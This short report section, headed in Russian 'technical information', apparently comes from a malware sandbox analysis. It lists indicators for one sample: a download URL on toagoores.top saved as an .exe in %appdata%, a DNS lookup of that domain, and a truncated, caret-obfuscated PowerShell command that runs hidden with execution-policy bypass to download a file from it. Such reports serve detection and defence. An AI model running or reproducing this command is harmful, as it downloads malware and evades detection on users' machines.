Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^O^w^eRS^HeLl.EXE ^-^E^XE^CU^Tion^pOli^C^y^ b^YPa^SS -^NOp^Ro^fILE^ ^-^WiNd^o^wStY^lE H^i^dden (^N^eW-OBjE^ct ^s^ySTem.ne^T^.^WebclieN^T)^.DOwNloadf^ILE^('http://toagoores.top/rea...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /c "p^O^w^eRS^HeLl.EXE ^-^E^XE^CU^Tion^pOli^C^y^ b^YPa^SS -^NOp^Ro^fILE^ ^-^WiNd^o^wStY^lE H^i^dden (^N^eW-OBjE^ct ^s^ySTem.ne^T^.^WebclieN^T)^.DOwNloadf^ILE^('http://toagoores.top/rea...' (со скрытым окном)